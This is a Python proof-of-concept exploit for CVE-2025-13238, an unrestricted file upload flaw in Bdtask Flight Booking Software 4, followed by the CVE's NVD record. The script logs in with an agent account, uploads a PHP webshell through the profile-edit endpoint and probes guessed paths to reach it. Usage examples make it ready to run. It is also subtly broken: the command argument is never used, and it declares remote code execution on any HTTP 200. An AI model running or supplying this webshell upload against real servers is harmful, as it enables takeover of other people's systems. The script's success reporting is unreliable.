CVE-2025-13238

import requests import sys # CVE-2025-13238 PoC - Bdtask Flight Booking Software 4 Unrestricted File Upload # Target: /agent/profile/edit endpoint def exploit(target_url, username, password, webshell_content): """ Exploit for CVE-2025-13238 Args: target_url: Base URL of the vulnerable application username: Valid agent account username password: Password for the account webshell_content: Content of the webshell to upload """ session = requests.Session() # Step 1: Login to get authenticated session login_url = f"{target_url}/login" login_data = { 'email': username, 'password': password } try: response = session.post(login_url, data=login_data, timeout=10) if response.status_code != 200: print("[-] Login failed - check credentials") return False print("[+] Successfully authenticated") # Step 2: Upload malicious file via profile edit upload_url = f"{target_url}/agent/profile/edit" # Prepare the malicious file files = { 'profile_image': ('shell.php', webshell_content, 'application/x-php') } # Additional form data may be required data = { 'first_name': 'Test', 'last_name': 'User', 'phone': '1234567890' } response = session.post(upload_url, files=files, data=data, timeout=10) if response.status_code == 200: print("[+] File upload request sent") # Step 3: Identify uploaded file location # Common patterns: /uploads/agents/, /assets/uploads/, /media/ possible_paths = [ f"{target_url}/uploads/agents/{username}_shell.php", f"{target_url}/assets/uploads/agent_shell.php", f"{target_url}/media/agent_shell.php" ] # Step 4: Verify and execute for path in possible_paths: check_response = session.get(path, timeout=10) if check_response.status_code == 200: print(f"[+] Found uploaded shell at: {path}") print(f"[+] webshell executed - RCE achieved") return True print("[-] Exploitation failed - file may not have been uploaded") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 5: print("Usage: python cve_2025_13238.py <target_url> <username> <password> <command>") print("Example: python cve_2025_13238.py http://target.com [email protected] pass123 'id'") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] cmd = sys.argv[4] # Simple PHP webshell webshell = f"<?php system($_GET['cmd']); ?>" exploit(target, user, pwd, webshell)

{"cve": {"id": "CVE-2025-13238", "sourceIdentifier": "[email protected]", "published": "2025-11-16T06:15:42.207", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in Bdtask Flight Booking Software 4. Affected by this vulnerability is an unknown functionality of the file /agent/profile/edit of the component Edit Profile Page. This manipulation causes unrestricted upload. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-434"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bdtask:flight_booking_software:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "3E38C34B-5FA2-4A84-BACC-A0A0436ECD7B"}]}]}], "references": [{"url": "https://github.com/4m3rr0r/PoCVulDb/issues/6", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.332564", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.332564", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.686895", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}